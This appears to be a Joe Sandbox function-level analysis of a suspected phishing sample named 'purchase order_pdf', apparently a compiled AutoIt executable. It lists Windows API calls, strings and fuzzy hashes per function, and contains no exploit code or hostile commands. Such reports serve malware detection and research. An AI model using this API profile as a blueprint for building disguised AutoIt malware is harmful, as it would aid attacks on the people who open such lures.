API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 0417a59e4fd15abe0a60286cc2c21f13169b685e90bf213837a9c76d3c8cb9d7
Instruction ID: 082820a97488d7b81f3f0c89edd3523bc6f28adc5ad95c0cd620d5dced1e66d8
Opcode Fuzzy Hash: 0417a59e4fd15abe0a60286cc2c21f13169b685e90bf213837a9c76d3c8cb9d7
Instruction Fuzzy Hash: 4F61FF72908216EFFB286F68D802B6977A9FF13731F144119E841DBD91DB34D941CAA3

Function 008DDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 008DDC7B
_wcscat.LIBCMT ref: 008DDC93
_wcscat.LIBCMT ref: 008DDCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008DDCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 008DDCCE
GetFileAttributesW.KERNEL32(?), ref: 008DDCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 008DDD00
SetCurrentDirectoryW.KERNEL32(?), ref: 008DDD12

Strings

*.*, xrefs: 008DDD51

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: fe9316451d9b06e5ef0e1a6f269e1b7630418d6cf57609a8961abdb40166bae5
Instruction ID: 3b6fe59783dceb16922c1ebc7d95e8defbda2bc152f4da76d12d9ac5d0a36c47
Opcode Fuzzy Hash: fe9316451d9b06e5ef0e1a6f269e1b7630418d6cf57609a8961abdb40166bae5
Instruction Fuzzy Hash: F4816F715043459FCB24EF28C8459AAB7E8FF88318F19892BF889CB351EB71D944CB52

Function 008FC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00872612: GetWindowLongW.USER32(?,000000EB), ref: 00872623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008FC4EC
GetFocus.USER32 ref: 008FC4FC
GetDlgCtrlID.USER32(00000000), ref: 008FC507
_memset.LIBCMT ref: 008FC632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 008FC65D
GetMenuItemCount.USER32(?), ref: 008FC67D
GetMenuItemID.USER32(?,00000000), ref: 008FC690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 008FC6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 008FC70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008FC744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 008FC779

Strings

0, xrefs: 008FC62A

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 2211a046021a4304ca35fb9036c2264512f82fa90cf0f642da6cb705b656ac0c
Instruction ID: 028db74a55d82a341d18bd874be080621fae4385ce1c210b96d1cb205ad312dd
Opcode Fuzzy Hash: 2211a046021a4304ca35fb9036c2264512f82fa90cf0f642da6cb705b656ac0c
Instruction Fuzzy Hash: 34813A70508349AFD710DF28CA84A7ABBE4FF98354F10492DFA95D7291D770DA05CBA2

Function 008C83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008C874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008C8766
Part of subcall function 008C874A: GetLastError.KERNEL32(?,008C822A,?,?,?), ref: 008C8770
Part of subcall function 008C874A: GetProcessHeap.KERNEL32(00000008,?,?,008C822A,?,?,?), ref: 008C877F
Part of subcall function 008C874A: HeapAlloc.KERNEL32(00000000,?,008C822A,?,?,?), ref: 008C8786
Part of subcall function 008C874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008C879D

Part of subcall function 008C87E7: GetProcessHeap.KERNEL32(00000008,008C8240,00000000,00000000,?,008C8240,?), ref: 008C87F3
Part of subcall function 008C87E7: HeapAlloc.KERNEL32(00000000,?,008C8240,?), ref: 008C87FA
Part of subcall function 008C87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008C8240,?), ref: 008C880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008C8458
_memset.LIBCMT ref: 008C846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008C848C
GetLengthSid.ADVAPI32(?), ref: 008C849D
GetAce.ADVAPI32(?,00000000,?), ref: 008C84DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008C84F6
GetLengthSid.ADVAPI32(?), ref: 008C8513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008C8522
HeapAlloc.KERNEL32(00000000), ref: 008C8529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 008C854A
CopySid.ADVAPI32(00000000), ref: 008C8551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008C8582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008C85A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 008C85BC

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 8b306e75a449dbbe68d38922d8cf53029ff3a8d6c3888033a858eec307370e29
Instruction ID: b4568a38af77fbb6a014a978d82db8a8b8f4b9a61ffa638e6d85d42989ea272f
Opcode Fuzzy Hash: 8b306e75a449dbbe68d38922d8cf53029ff3a8d6c3888033a858eec307370e29
Instruction Fuzzy Hash: F961227194021AEFDF009FA4DC85EAEBBB9FF48300B04816AE915E7291DB71DA15CF60

Function 008E762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 008E76A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008E76AE
CreateCompatibleDC.GDI32(?), ref: 008E76BA
SelectObject.GDI32(00000000,?), ref: 008E76C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 008E771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 008E7757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 008E777B
SelectObject.GDI32(00000006,?), ref: 008E7783
DeleteObject.GDI32(?), ref: 008E778C
DeleteDC.GDI32(00000006), ref: 008E7793
ReleaseDC.USER32(00000000,?), ref: 008E779E

Strings

(, xrefs: 008E7723

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: f8c7b943576a4d98a0eb383dff8d0ae438674c3fb1669e9954e15e50d99457c5
Instruction ID: eae0624f6a1eb7fabacf21719031784b856d67439ef0b266d2934bd323a03c0b
Opcode Fuzzy Hash: f8c7b943576a4d98a0eb383dff8d0ae438674c3fb1669e9954e15e50d99457c5
Instruction Fuzzy Hash: 33515875904649EFCB15CFA9CC84EAEBBB9FF49310F148429FA5AD7221D731A940CB60

Function 008DA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,008FFB78), ref: 008DA0FC

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 008DA11E
__swprintf.LIBCMT ref: 008DA177
__swprintf.LIBCMT ref: 008DA190
_wprintf.LIBCMT ref: 008DA246
_wprintf.LIBCMT ref: 008DA264

Strings

Error: , xrefs: 008DA20E
"%s" (%d) : ==> %s:, xrefs: 008DA25F
^ ERROR, xrefs: 008DA1E8
"%s" (%d) : ==> %s:%s%s, xrefs: 008DA241
Line %d (File "%s"):, xrefs: 008DA171, 008DA18A

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 8ec3c8ea7b22c15607ccfe5fbd8fc32caaf605cb6ab0776c1c7a070941dfead8
Instruction ID: c9346a1fd8fe77484fccf20934c02e5d6cc0facc67eb8133136d3d88cd00c10d
Opcode Fuzzy Hash: 8ec3c8ea7b22c15607ccfe5fbd8fc32caaf605cb6ab0776c1c7a070941dfead8
Instruction Fuzzy Hash: FE518032904219AACF15EBA4CD86EEEB779FF05300F204165F519F21A5DB31AF48DB62

Function 00876BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00890B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00876C6C,?,00008000), ref: 00890BB7

Part of subcall function 008748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008748A1,?,?,008737C0,?), ref: 008748CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00876D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00876E5A

Part of subcall function 008759CD: _wcscpy.LIBCMT ref: 00875A05

Part of subcall function 0089387D: _iswctype.LIBCMT ref: 00893885

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 008AE84A
Unterminated string, xrefs: 008AEC0D
Bad directive syntax error, xrefs: 008AEBC6
Error opening the file, xrefs: 008AE866, 008AE8E1
EA06, xrefs: 008AE87B
>>>AUTOIT SCRIPT<<<, xrefs: 008AE8BF
AU3!, xrefs: 00876CC1

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 8c13a1f3ecf632345db32a06f2ca6e74ab8d661a4f5b0ab24ca6dbc9d8e8a41a
Instruction ID: 8dfa31e6521c43869acc268aba8f7109409cb6561921a8b44a93fcf01521b18c
Opcode Fuzzy Hash: 8c13a1f3ecf632345db32a06f2ca6e74ab8d661a4f5b0ab24ca6dbc9d8e8a41a
Instruction Fuzzy Hash: B30265311087419EC724EF28C881AAEBBE5FF95314F14892DF48AD32A2DB70D949CB53

Function 008745DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008745F9
GetMenuItemCount.USER32(00936890), ref: 008AD7CD
GetMenuItemCount.USER32(00936890), ref: 008AD87D
GetCursorPos.USER32(?), ref: 008AD8C1
SetForegroundWindow.USER32(00000000), ref: 008AD8CA
TrackPopupMenuEx.USER32(00936890,00000000,?,00000000,00000000,00000000), ref: 008AD8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008AD8E9

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: ad97e1c2fa31d21394b48c43a85d271c2ed99e52b2c4522b74035a5470ce96eb
Instruction ID: 557c2f643cd975d38597e8d944927871fa8828c8890b45b29bace146989bad93
Opcode Fuzzy Hash: ad97e1c2fa31d21394b48c43a85d271c2ed99e52b2c4522b74035a5470ce96eb
Instruction Fuzzy Hash: 4A71F670604319BAFB249F24DC45FAABF64FF06358F104216F629EA6E1C7B19C50DB91

Function 008F10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,008F0038,?,?), ref: 008F10BC

Strings

HKCC, xrefs: 008F118A
HKCU, xrefs: 008F11AC
HKEY_LOCAL_MACHINE, xrefs: 008F1125
HKU, xrefs: 008F11CE
HKCR, xrefs: 008F1164
HKEY_CURRENT_CONFIG, xrefs: 008F1179
HKLM, xrefs: 008F113A
HKEY_CLASSES_ROOT, xrefs: 008F114F
HKEY_USERS, xrefs: 008F11BD
HKEY_CURRENT_USER, xrefs: 008F119B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 98423e709787c4d766772f79cde99b1bad3687158f92dffd4269be41a2e11360
Instruction ID: be4a1ab063c064e17b087113e9495433f34399c736f960515a97ee0406d74d2c
Opcode Fuzzy Hash: 98423e709787c4d766772f79cde99b1bad3687158f92dffd4269be41a2e11360
Instruction Fuzzy Hash: F6417B3015425ECBCF20EFA8E895AFA37A4FF11300F144515EE91DB29ADB34A95ACB61

Function 008D5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00877D2C: _memmove.LIBCMT ref: 00877D66

Part of subcall function 00877A84: _memmove.LIBCMT ref: 00877B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008D55D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008D55E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008D55F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008D560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008D561C

Strings

close PlayMe, xrefs: 008D55E3, 008D5610
open , xrefs: 008D5581
status PlayMe mode, xrefs: 008D55CD
play PlayMe, xrefs: 008D5617
play PlayMe wait, xrefs: 008D5606
alias PlayMe, xrefs: 008D55AB

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: b7c367e6e2b1ea4de5d9d3d8b9e71ce6565e7cd9e56d1678a351f86650611945
Instruction ID: 25e57ddc94447911452a4a7b8aa2aebc5a83c5e5e9199d522528c9a2f370f31f
Opcode Fuzzy Hash: b7c367e6e2b1ea4de5d9d3d8b9e71ce6565e7cd9e56d1678a351f86650611945
Instruction Fuzzy Hash: 121193215501697AE720E6A5EC8ADBFBB7CFFD5B04F40052AB405E20D9DE609D05C5A2

Function 008D48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 008D490E
gethostname.WSOCK32(?,00000100), ref: 008D4928
gethostbyname.WSOCK32(?), ref: 008D4935
_wcscpy.LIBCMT ref: 008D495D
_memmove.LIBCMT ref: 008D4970
inet_ntoa.WSOCK32(?), ref: 008D497B
_strcat.LIBCMT ref: 008D4989
_wcscpy.LIBCMT ref: 008D49A0
WSACleanup.WSOCK32 ref: 008D49AE
_wcscpy.LIBCMT ref: 008D49BC

Strings

0.0.0.0, xrefs: 008D4957

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: a66f72f9780739f91721f526cf0fd2455c4e1379e304ae57f8a5a315251cf9d4
Instruction ID: e46c2ba8407e4956438677cce3414019dbf74c2f28b1fbd82ade5eaac1fee5fc
Opcode Fuzzy Hash: a66f72f9780739f91721f526cf0fd2455c4e1379e304ae57f8a5a315251cf9d4
Instruction Fuzzy Hash: 4411C331904119BBCF20FB759C4AEEA7BACFF40710F1802B6F504D6262EF719A818652

Function 008D5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 008D521C

Part of subcall function 00890719: timeGetTime.WINMM(?,75C0B400,00880FF9), ref: 0089071D

Sleep.KERNEL32(0000000A), ref: 008D5248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 008D526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008D528E
SetActiveWindow.USER32 ref: 008D52AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008D52BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 008D52DA
Sleep.KERNEL32(000000FA), ref: 008D52E5
IsWindow.USER32 ref: 008D52F1
EndDialog.USER32(00000000), ref: 008D5302

Strings

BUTTON, xrefs: 008D5280

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 30ea5e0339872caa985105edb69df5ec6db4d962dc13983acaf6473b4198ac15
Instruction ID: fa4bd0533d478593ba2895ff55f1e0c3701cd1b96ddd748a442e6348768912d6
Opcode Fuzzy Hash: 30ea5e0339872caa985105edb69df5ec6db4d962dc13983acaf6473b4198ac15
Instruction Fuzzy Hash: 24219FB0208704AFEB155FB4EC88E3A7B69FF55347B10052AF601C23B2DB659C44EA22

Function 008DD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00879997: __itow.LIBCMT ref: 008799C2
Part of subcall function 00879997: __swprintf.LIBCMT ref: 00879A0C

CoInitialize.OLE32(00000000), ref: 008DD855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008DD8E8
SHGetDesktopFolder.SHELL32(?), ref: 008DD8FC
CoCreateInstance.OLE32(00902D7C,00000000,00000001,0092A89C,?), ref: 008DD948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008DD9B7
CoTaskMemFree.OLE32(?,?), ref: 008DDA0F
_memset.LIBCMT ref: 008DDA4C
SHBrowseForFolderW.SHELL32(?), ref: 008DDA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008DDAAB
CoTaskMemFree.OLE32(00000000), ref: 008DDAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008DDAE9
CoUninitialize.OLE32(00000001,00000000), ref: 008DDAEB

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 46d7c9bac0a7708e3b87a4a3e0fe5b3745e83c41076ead8f6d1cc04b0e602613
Instruction ID: 25face76038fe0c2791b12215178a69cf950e58bad77520d258de57815e4ba2d
Opcode Fuzzy Hash: 46d7c9bac0a7708e3b87a4a3e0fe5b3745e83c41076ead8f6d1cc04b0e602613
Instruction Fuzzy Hash: 15B1EA75A00219AFDB04DFA8C888EAEBBB9FF48314B148569F509EB351DB30ED45CB51

Function 008D052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 008D05A7
SetKeyboardState.USER32(?), ref: 008D0612
GetAsyncKeyState.USER32(000000A0), ref: 008D0632
GetKeyState.USER32(000000A0), ref: 008D0649
GetAsyncKeyState.USER32(000000A1), ref: 008D0678
GetKeyState.USER32(000000A1), ref: 008D0689
GetAsyncKeyState.USER32(00000011), ref: 008D06B5
GetKeyState.USER32(00000011), ref: 008D06C3
GetAsyncKeyState.USER32(00000012), ref: 008D06EC
GetKeyState.USER32(00000012), ref: 008D06FA
GetAsyncKeyState.USER32(0000005B), ref: 008D0723
GetKeyState.USER32(0000005B), ref: 008D0731

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 66aab61ab3f35e1008f7154b7bdba2dd1dbc9debf440219ddb1cbdd1bcbf921d
Instruction ID: 868a58a83001f9c46bd7862c0838779ff2abf60920ef23d69df0930103b91687
Opcode Fuzzy Hash: 66aab61ab3f35e1008f7154b7bdba2dd1dbc9debf440219ddb1cbdd1bcbf921d
Instruction Fuzzy Hash: F851A860A0478429FF35DBB494557EABFB4FF11340F08479B99C29A2C2DA64DA4CCF52

Function 008CC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 008CC746
GetWindowRect.USER32(00000000,?), ref: 008CC758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 008CC7B6
